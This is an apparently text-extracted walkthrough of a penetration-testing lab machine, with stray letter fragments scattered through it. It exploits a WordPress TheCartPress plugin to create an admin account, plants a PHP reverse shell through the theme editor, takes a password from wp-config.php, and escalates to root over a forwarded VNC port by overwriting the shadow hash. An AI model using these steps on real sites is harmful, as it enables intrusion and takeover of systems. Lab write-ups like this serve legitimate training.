r

i to
.110

Initial shell

Port scan detail:

Ed
DF
rP
te
Wordpress running on port 80 can be scanned with wpscan or thecartpress plugin is detected by
looking directly at the source code.

Thecartpress exploit search on googlefound below exploit

as

https://www.exploit-db.com/exploits/50378
python3 50378.py http://targetIP
M

After that you can be login with admin wordpress

data = {
"tcp_new_user_name" : "admin_02",
in

"tcp_new_user_pass" : "admin1234",
"tcp_repeat_user_pass" : "admin1234",
"tcp_new_user_email" : "test@test.com",
"tcp_role" : "administrator"
ed

After admin Go to theme editor, use pentest monkey php reverse shell instead of archive.php. Visit
archive.php and you will get the reverse shell.
at

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
re
 r
i to
Visit site and you have rev shell

The imported shell will give you www-data as user. Then use linpeas.sh. It will give you a password in
wp config.php.

Ed
Full file path: /srv/www/wordpress/wp-config.php

With this password, the user in the home can be logged in.

DF
rP
Jsmith:tequieromucho

Now lateral movement is done. Ssh is done with the password found.

It is recommended to run linpeas.sh again.

te
You will see that the VNC port only works inside.
as

Bring the port to the local machine with SSH remote port forwarding.
M

Ssh –N –R tun0IP:5901:127.0.0.1:5901 kali@tun0IP

then login using vinviewer.

To log in, we must use the password we found in the config file before.
in

vncviewer127.0.0.1:5901

tequieromucho
ed

Session will be opened as root, but only type and cat can be used by Off sec rules.

Since we are root, we ensure that the root hash in /etc/shadow is the same as the jsmith hash. By
this means
at

You can be rooted with the tequieromucho password.

After that use ssh for root user.

re